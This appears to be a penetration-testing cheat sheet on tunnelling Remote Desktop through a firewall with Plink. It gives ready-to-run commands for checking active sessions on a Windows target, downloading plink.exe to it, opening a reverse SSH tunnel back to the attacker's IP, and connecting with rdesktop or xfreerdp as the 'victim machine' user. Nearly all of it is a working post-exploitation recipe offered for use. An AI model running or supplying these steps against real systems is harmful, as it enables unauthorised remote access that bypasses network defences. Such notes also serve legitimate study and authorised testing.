Plink for Remote Desktop Connections

Used in case RDP service (usually 3389/tcp) is not accessible directly (i.e. not allowed through the external firewall)

1. On local machine (~Kali)

   1. Create a limited user¹

2. On target machine (Windows)

   1. Check first if somebody has currently connected to the host's RDP service
      • qwinsta /server:<server_name>
   2. Download plink.exe on the target machine
   3. Execute a reverse SSH connection using Plink.exe
      • echo y | plink.exe <YOUR_IP> -P 22 -R 3389:127.0.0.1:3389 -l <created_limited_username> -pw <password>
3. On the local machine (~Kali)
   1. Connect to the RDP service using an RDP Client
      • rdesktop -g90x90 localhost (Usually fails)
      • xfreerdp /u:"<victim_machine_username>" /v:localhost:3389

---

1. Instructions on creating a limited user ↩

---

Last update: January 22, 2021